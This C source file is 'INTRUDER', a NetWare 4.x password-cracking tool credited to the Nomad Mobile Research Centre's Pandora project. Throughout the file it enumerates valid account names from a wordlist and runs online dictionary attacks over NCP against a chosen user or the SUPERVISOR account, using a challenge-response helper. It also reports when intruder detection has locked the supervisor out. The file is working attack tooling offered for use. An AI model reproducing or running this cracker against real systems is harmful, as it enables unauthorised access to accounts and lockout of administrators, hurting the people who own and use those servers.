#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include "..\pandora\pan_glob.h"
#include "..\pandora\pan_hash.h"
#include "panrcp.h"

int testpw(char *name, int type, char *pw)
{
 Pan_PassHack pPassHack;
 uint8 logkey[8];
 uint32 id_of_user=0;
 int i,err;

 if (getlogkey(logkey)) return(trypw(name,type,pw));

 err=getobjid(name,type,&id_of_user);
 if (err) return (err);

 pPassHack.objectID=id_of_user;
 pPassHack.pwlen=strlen(pw);
 for(i=0;i<pPassHack.pwlen;i++) pPassHack.pw_first[i]=(uint8)pw[i];
 pPassHack.pw_first[pPassHack.pwlen]='\0';

 /* FALSE to say hash is unknown */
 /* logkey in entry is challenge, logkey in output is response */
 err=Pan_Challenge_Response(&pPassHack,FALSE,logkey,logkey);
 if (err) return (err);

 return(trypwcrypt(logkey,type,name));
}

/*
 * print usage if needed
 */
void printHelp(int j, char *w)
{
   if (j==2) printf("No argument given for option -%s\n\n",w);
   printf("USAGE: intruder <options>\n");
   printf("  -a            Check a wordlist containing possible ACCOUNT names.\n");
   printf("  -h            This HELP screen.\n");
   printf("  -u            Dictionary attack the USER specified.\n");
   printf("  -s            Special dictionary attack for SUPERVISOR.\n");
   printf("  -v            VERBOSE to show progress.\n");
   printf("  -w            WORDLIST for -a or -u options.\n\n");
   printf("EXAMPLE:\n");
   printf("  intrude -a -w accounts.txt\n");
   printf("  intrude -u Admin -w diction.ary\n");
   printf("  intrude -s -w diction.ary\n\n");
   exit(j);
}

/*
 * Main prog
 */
int main(int argc, char *argv[])
{
  FILE *f;
  int err,i,mode=0,verbose=FALSE,FOUND=FALSE;

  char *wordlist = (char *)calloc(1,sizeof(char)*MAX_CHARS);
  char *words = (char *)calloc(1,sizeof(char)*MAX_CHARS);
  char *user = (char *)calloc(1,sizeof(char)*MAX_CHARS);

  err=Pan_NCP_connect(0);
  if (err) printf("failed setconn : %02x\n",err);

  /* say hello... */
  printf("INTRUDER - Netware 4.x Intruder\n");
  printf("Comments/bugs: pandora@nmrc.org\n");
  printf("http://www.nmrc.org/pandora\n");
  printf("1997,1998 (c) Nomad Mobile Research Centre\n\n");

  if (argc<3) printHelp(1,NULL);

  /* process command line */
  for (i=1 ; i<argc ; i++)
  {
     if (argv[i][0]=='-')
	 switch(argv[i][1])
	 {
	    case 'a':
	    case 'A':
	       mode=1;
	       break;
	    case 'u':
	    case 'U':
               if ((i+1>argc) || (argv[i+1]==NULL)) printHelp(2,"u");
               if (argv[i+1][0]=='-') printHelp(2,"u");
	       user=argv[i+1];
	       mode=2;
	       break;
	    case 's':
	    case 'S':
	       mode=3;
	       break;
	    case 'v':
	    case 'V':
	       verbose=TRUE;
	       break;
	    case 'w':
	    case 'W':
               if ((i+1>argc) || (argv[i+1]==NULL)) printHelp(2,"w");
               if (argv[i+1][0]=='-') printHelp(2,"w");
	       wordlist=argv[i+1];
	       break;
	    case 'h':
	    case 'H':
            case '?':
	       printHelp(0,NULL);
	    default:
	       printf("Invalid option: %s\n", argv[i]);
	       printHelp(1,NULL);
	 }
  }
  /* post command line processing */
  if (mode==0 || wordlist==NULL) printHelp(2,"w");

  switch(mode)
  {
    case 1:
      f=fopen(wordlist, "r");
      if (f==NULL)
      {
	printf("Unable to open %s\n",wordlist);
	perror("Error");
	exit(-1);
      }

      /* the crack loop -- break out if done */
      while (!feof(f))
      {
       fgets(words,48,f);
       words[strlen(words)-1]='\0'; /*remove carriage return*/
       err=testpw(words,0x100,NULL);
       if (err==0||err==255)
	{
         printf("%s is a valid account",words);
         if (err==0)
          printf(" -- no password");
         printf(".\n");
	}
      };
      break;
    case 2:
	err=testpw(user,0x0100,NULL);
	if (err==0)
	 {
	  FOUND=TRUE;
	  words=NULL;
	  break;
	 }
	if (err==0xfc)
	 {
	  printf("User %s is not a valid account.\n",user);
	  exit(1);
	 }
	/* open the dictionary */
	f=fopen(wordlist, "r");
	if (f==NULL)
	 {
	  printf("Unable to open %s\n",wordlist);
	  perror("Error");
	  exit(1);
	 }

	/* the crack loop -- break out if done or the password found */
	while (!feof(f))
	{
	 fgets(words,128,f);
         words[strlen(words)-1]='\0'; /*remove carriage return*/
	  for (i=0;i<strlen(words);i++)
	    words[i]=toupper(words[i]); /* convert lower case letters
					 to upper case letters */
	  if (verbose==TRUE) printf("%s\n",words);
	  err=testpw(user,0x0100,words);
	  if (err==0)
	  {
           FOUND=TRUE;
           break;
	  }
	};
	break;
    case 3:
        user="SUPERVISOR";
        /* open the dictionary */
        f=fopen(wordlist, "r");
        if (f==NULL)
         {printf("Unable to open %s\n",wordlist);
          exit(1);
         }

        /* the crack loop -- break out if done or the password found */
        while (!feof(f))
         {
          fgets(words, 128, f);
          words[strlen(words)-1]='\0'; /* remove carriage return */
          for (i=0;i<strlen(words);i++)
          words[i]=toupper(words[i]); /* convert lower case letters
    	                                 to upper case letters */
          if (verbose==TRUE) printf("\n%s",words);
          err=trypw(words,0x0100,"SUPERVISOR");
          if (err==0x00)
           {
            FOUND=TRUE;
            break;
           }
          if (err==0xc5)
           {
            printf("\n ** Intruder Detection active and Supe is now locked out. **\n\n");
            exit(3);
           }
         };
        break;
    case 0:
    default: /*  Need help */
      printHelp(1,0);
  }
  if (f) fclose(f);

  /* print it if we found it, otherwise give the bad news */
  if (mode==1) exit(0);
  if (FOUND==TRUE)
  {
    printf("\n%s's password is ",user);
    if (words==NULL) printf("NULL.\n");
    else printf("%s\n",words);
  }
  else
    printf("\n%s's password not found.\n",user);
  return(0);
} 
